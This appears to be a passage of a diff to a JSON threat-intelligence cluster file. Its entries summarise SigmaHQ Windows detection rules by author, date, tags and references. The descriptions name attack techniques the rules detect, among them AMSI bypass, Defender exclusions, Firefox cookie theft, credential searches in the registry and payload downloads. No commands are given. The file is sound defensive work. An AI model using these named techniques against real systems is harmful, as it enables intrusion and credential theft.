"d78b5d61-187d-44b6-bf02-93486a80de5a", + "value": "DInject PowerShell Cradle CommandLine Flags" + }, + { + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "4e762605-34a8-406d-b72e-c1a089313320", + "value": "Detecting Fake Instances Of Hxtsr.exe" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ntfs_short_name_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "value": "Use NTFS Short Name in Image" + }, + { + "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/christophetd/status/1164506034720952320", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", + "value": "Renamed PowerShell" + }, + { + "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", + "meta": { + "author": "frack113", + "creation_date": "2022/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlite_firefox_cookies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ] + }, + "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", + "value": "SQLite Firefox Cookie DB Access" + }, + { + "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/26", + "falsepositive": [ + "Google Drive", + "Citrix" + ], + "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "value": "Command Line Path Traversal Evasion" + }, + { + "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", + "meta": { + "author": "Teymur Kheirkhabarov, Florian Roth", + "creation_date": "2019/10/23", + "falsepositive": [ + "Possible name overlap with NT AUHTORITY substring to cover all languages" + ], + "filename": "proc_creation_win_whoami_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1574.011" + "attack.discovery", + "attack.t1033" ] }, - "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "value": "Possible Privilege Escalation via Service Permissions Weakness" + "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", + "value": "Run Whoami as SYSTEM" }, { - "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/17", + "author": "Florian Roth", + "creation_date": "2021/02/01", "falsepositive": [ - "Unlikely" + "Unknown" ], - "filename": "proc_creation_win_powershell_amsi_bypass.yml", + "filename": "proc_creation_win_susp_shimcache_flush.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/735261176745988096", - "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" + "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ] }, - "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "value": "Powershell AMSI Bypass via .NET Reflection" + "uuid": "b0524451-19af-4efa-a46f-562a977f792e", + "value": "ShimCache Flush" }, { - "description": "Detects audio capture via PowerShell Cmdlet.", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", + "author": "frack113", + "creation_date": "2021/07/13", "falsepositive": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], - "filename": "proc_creation_win_powershell_audio_capture.yml", + "filename": "proc_creation_win_infdefaultinstall.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" ], "tags": [ - "attack.collection", - "attack.t1123" + "attack.defense_evasion", + "attack.t1218" ] }, - "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", - "value": "Audio Capture via PowerShell" + "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "value": "InfDefaultInstall.exe .inf Execution" + }, + { + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "value": "Operator Bloopers Cobalt Strike Modules" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_invocation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "value": "Execution via CL_Invocation.ps1" + }, + { + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_command_flag_pattern.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" + ], + "tags": "No established tags" + }, + "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "value": "Suspicious RunAs-Like Flag Combination" }, { "description": "Detects Base64 encoded Shellcode", @@ -44263,242 +40671,879 @@ "value": "PowerShell Base64 Encoded Shellcode" }, { - "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "description": "Detects execution of the IEExec utility to download payloads", "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "creation_date": "2020/10/11", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/16", "falsepositive": [ - "Unlikely" + "Unknown" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "filename": "proc_creation_win_lolbin_ieexec_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] + "tags": "No established tags" }, - "uuid": "74403157-20f5-415d-89a7-c505779585cf", - "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" + "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "value": "Abusing IEExec To Download Payloads" }, { - "description": "Detects the PowerShell command lines with reversed strings", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "creation_date": "2020/10/11", + "author": "Florian Roth", + "creation_date": "2022/07/11", "falsepositive": [ - "Unlikely" + "Unknown" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "value": "Suspicious PowerShell Obfuscated PowerShell Code" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", + "value": "Automated Turla Group Lateral Movement" + }, + { + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_alternate_data_streams.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1564.004" ] }, - "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "value": "Suspicious PowerShell Cmdline" + "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "value": "Execute From Alternate Data Streams" }, { - "description": "Detects the PowerShell command lines with special characters", + "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", - "creation_date": "2020/10/15", + "author": "Florian Roth", + "creation_date": "2022/06/08", "falsepositive": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "filename": "proc_creation_win_renamed_rundll32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", + "value": "Renamed Rundll32.exe Execution" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1484.001" ] }, - "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "value": "Suspicious PowerShell Command Line" + "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", + "value": "Modify Group Policy Settings" }, { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "creation_date": "2020/10/11", + "author": "Nasreddine Bencherchali (rule)", + "creation_date": "2022/05/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_JohnHammond/status/1531672601067675648", + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "value": "Execute Arbitrary Commands Using MSDT.EXE" + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "value": "Enumeration for Credentials in Registry" + }, + { + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "value": "Custom Class Execution via Xwizard" + }, + { + "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.t1053" + ] + }, + "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", + "value": "Exchange Exploitation Activity" + }, + { + "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/20", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "filename": "proc_creation_win_apt_unc2452_ps.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1047" + ] + }, + "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", + "value": "UNC2452 PowerShell Pattern" + }, + { + "description": "Detect possible Sysmon driver unload", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_driver_unload.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" + ] + }, + "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "value": "Sysmon Driver Unload" + }, + { + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_change_default_file_association.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1546.001" ] }, - "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "value": "Encoded PowerShell Command Line" + "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "value": "Change Default File Association" }, { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "creation_date": "2022/07/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", - "value": "Suspicious Xor PowerShell Command Line" - }, - { - "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", "meta": { "author": "Florian Roth", - "creation_date": "2022/03/04", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "filename": "proc_creation_win_powershell_defender_base64.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", - "value": "Powershell Defender Base64 MpPreference" - }, - { - "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/03", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "filename": "proc_creation_win_powershell_defender_disable_feature.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", - "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", - "value": "Powershell Defender Disable Scan Feature" - }, - { - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/29", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", - "value": "Powershell Defender Exclusion" - }, - { - "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/25", + "creation_date": "2019/01/16", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_powershell_dll_execution.yml", + "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution" + ] + }, + "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "value": "Java Running with Remote Debugging" + }, + { + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "creation_date": "2021/12/17", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" ], "tags": [ - "attack.defense_evasion", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "value": "Suspicious Shells 